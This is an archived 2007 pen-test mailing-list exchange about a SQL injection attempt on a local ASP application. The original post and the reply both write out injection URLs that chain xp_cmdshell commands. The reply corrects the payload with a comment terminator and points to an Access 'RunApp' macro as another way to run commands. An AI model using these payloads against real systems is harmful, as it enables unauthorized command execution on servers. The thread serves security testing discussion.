From: Goran Pizent (goran.pizent@mobilnet.hr)
Date: Wed Jun 06 2007 - 05:29:56 EDT
Few thigs:
>http://localhost/account.asp?ID=3D12';Exec master..xp_cmdshell 'dir
Should be:
http://localhost/account.asp?ID=3D12';Exec master..xp_cmdshell 'dir';--
-- is to comment out any where order by parts of SQL request
Another thing is you are obviously accessing MS Access database.
xp_cmdshell will not help you here.
Google "RunApp" Access macro and change request...
Regards,
GoranP
-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] On
Behalf Of DokFLeed
Sent: 5. lipanj 2007 11:48
To: pen-test@securityfocus.com
Subject: Missing Operator SQL
Howdy
I am testing this local application, not really a big fan of ASP so any =
help is welcome
http://localhost/account.asp?ID=3D12';Exec master..xp_cmdshell 'dir
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression 'D.xID=3D12';EXEC =
master..xp_cmdshell 'dir'.
What is the missing operator for ?
Cheers,
Dok
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:51 EDT